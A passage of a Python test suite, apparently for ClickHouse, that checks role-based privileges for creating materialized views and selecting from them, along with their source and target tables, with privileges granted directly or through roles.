def create_with_populate_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with POPULATE specified if and only if
they have CREATE VIEW and INSERT privileges for the view, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_populate,
name="create with populate privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_populate,
name="create with populate privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_populate(self, user_name, grant_target_name, node=None):
"""Check that user is only able to create the view after INSERT privilege is granted."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant INSERT privilege on the view"):
node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT 1",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_populate_source_table_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to create a view with POPULATE and a source table specified if and only if
they have CREATE VIEW and INSERT privileges for the view, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_populate_source_table,
name="create with populate and source table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_populate_source_table,
name="create with populate and source table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_populate_source_table(self, user_name, grant_target_name, node=None):
"""Check that user is only able to create the view after INSERT privilege is granted."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the source table"):
node.query(f"GRANT SELECT ON {table_name} TO {user_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant INSERT privilege on the view"):
node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Select("1.0"),
)
def select(self, node=None):
"""Test the RBAC functionality of the `SELECT FROM materialized view` command"""
Scenario(
run=select_without_select_privilege, setup=instrument_clickhouse_server_log
)
Scenario(
run=select_with_select_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_select_privilege_revoked_directly_or_from_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_without_source_table_privilege,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_join_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_union_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_join_union_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_nested_views_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_with_privilege_granted_directly_or_via_role_without_target_table_privilege,
setup=instrument_clickhouse_server_log,
)
@TestScenario
def select_without_select_privilege(self, node=None):
"""Check that user is unable to select on a view without view SELECT privilege."""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with Then("I try to select from view without privilege as the user"):
node.query(
f"SELECT * FROM {view_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view if and only if they have select privilege on that view, either directly or from a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_select_privilege,
name="select with select privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_select_privilege,
name="select with select privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on a view and check the user is able to SELECT from it."""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
output = node.query(
f"SELECT count(*) FROM {view_name}", settings=[("user", f"{user_name}")]
).output
assert output == "1", error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to select from a view if their SELECT privilege is revoked, either directly or from a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_select_privilege,
name="select with select privilege revoked directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_select_privilege,
name="select with select privilege revoked from a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_revoked_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant and revoke SELECT privilege on a view and check the user is unable to SELECT from it."""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with And("I revoke SELECT privilege for the view"):
node.query(f"REVOKE SELECT ON {view_name} FROM {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
node.query(
f"SELECT count(*) FROM {view_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_without_source_table_privilege(self, node=None):
"""Check that user is unable to select from a view without SELECT privilege for the source table."""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
try:
with When("I create a view from the source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
)
with And("I grant view select privilege to the user"):
node.query(f"GRANT SELECT ON {view_name} TO {user_name}")
with Then(
"I attempt to select from view without privilege on the source table"
):
node.query(
f"SELECT count(*) FROM {view_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view, with source table in the stored query, if and only if
the user has SELECT privilege for the view and the source table, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_source_table_privilege,
name="select with source table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_source_table_privilege,
name="select with source table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_source_table_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on view and the source table for that view and check the user is able to SELECT from the view."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view with a source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
)
with And("I grant select privileges"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I check the user is able to select from the view"):
output = node.query(
f"SELECT count(*) FROM {view_name}",
settings=[("user", f"{user_name}")],
).output
assert output == "0", error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query has two subqueries if and only if
the user has SELECT privilege for that view and all tables, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_subquery,
name="select with subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_subquery,
name="select with subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with Given("I have a view with a subquery"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
)
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=3):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table2_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=3)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
):
with Then("I attempt to select from a view as the user"):
output = node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
).output
assert output == "0", error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `JOIN` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_join_query,
name="select with join, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_join_query,
name="select with join, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a JOIN statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
)
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `UNION ALL` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_union_query,
name="select with union, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_union_query,
name="select with union, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_union_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a UNION statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
)
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_union_subquery_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to select from a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_union_subquery(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(
node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
)
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=5):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table2_name,
table3_name,
table4_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=5)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
table3_name,
table4_name,
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view_name=view_name),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view with a stored query that includes other views if and only if
the user has SELECT privilege on all of the views and the source tables for those views, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_with_nested_views,
name="select with nested views, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_with_nested_views,
name="select with nested views, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant SELECT on views and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view3_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
node.query(
f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)"
)
node.query(
f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y"
)
node.query(
f"CREATE VIEW {view3_name} AS SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}"
)
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view3_name=view3_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in (
[0, 1, 3, 5, 7, 13, 15, 23, 31, 45, 63, 95, 127, 173, 237, 247, 253],
permutations(table_count=8),
)[self.context.stress]:
with grant_select_on_table(
node,
permutation,
grant_target_name,
view3_name,
table3_name,
view2_name,
view1_name,
table2_name,
view0_name,
table1_name,
table0_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view3_name=view3_name),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all views"):
with grant_select_on_table(
node,
max(permutations(table_count=8)) + 1,
grant_target_name,
view0_name,
view1_name,
view2_name,
view3_name,
table0_name,
table1_name,
table2_name,
table3_name,
):
with Then("I attempt to select from a view as the user"):
node.query(
select_view_query.format(view3_name=view3_name),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestScenario
def select_with_privilege_granted_directly_or_via_role_without_target_table_privilege(
self, node=None
):
"""Check that user is able to select from a materialized view without target table SELECT privilege."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_without_target_table_privilege,
name="select without target table privilege, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_without_target_table_privilege,
name="select without target table privilege, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_without_target_table_privilege(
self, grant_target_name, user_name, node=None
):
"""GRANT the user SELECT privilege on the view and check the user is able to successfully SELECT from the view without target table privilege."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1"
)
with When("I grant SELECT privilege on the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from a view as the user"):
node.query(
f"SELECT * FROM {view_name}", settings=[("user", f"{user_name}")]
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
def select_from_tables(self, node=None):
"""Testing RBAC functionality of SELECT for tables related to materialized views - target tables, source tables."""
Scenario(
run=select_from_implicit_target_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_from_explicit_target_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=select_from_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_TargetTable("1.0"))
def select_from_implicit_target_table_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to SELECT from the implicit target table created from a materialized view
if they have SELECT privilege on that table.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_from_implicit_target_table,
name="select from implicit target table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_from_implicit_target_table,
name="select from implicit target table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_implicit_target_table(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the implicit target table and check the user is able to SELECT only if they have SELECT privilege on the table."""
view_name = f"view_{getuid()}"
implicit_table_name = f'\\".inner.{view_name}\\"'
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with Then("I attempt to SELECT from the implicit target table as the user"):
node.query(
f"SELECT * FROM {implicit_table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the implicit target table as the user"):
node.query(
f"SELECT * FROM {implicit_table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the target table"):
node.query(f"GRANT SELECT ON {implicit_table_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the implicit target table as the user"):
node.query(
f"SELECT * FROM {implicit_table_name}",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_TargetTable("1.0"))
def select_from_explicit_target_table_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to SELECT from the explicit target table created from a materialized view
if they have SELECT privilege on that table.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_from_explicit_target_table,
name="select from explicit target table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_from_explicit_target_table,
name="select from explicit target table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_explicit_target_table(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the explicit target table and check the user is able to SELECT only if they have SELECT privilege on the table."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1"
)
with Then("I attempt to SELECT from the explicit target table as the user"):
node.query(
f"SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the explicit target table as the user"):
node.query(
f"SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the target table"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the explicit target table as the user"):
node.query(
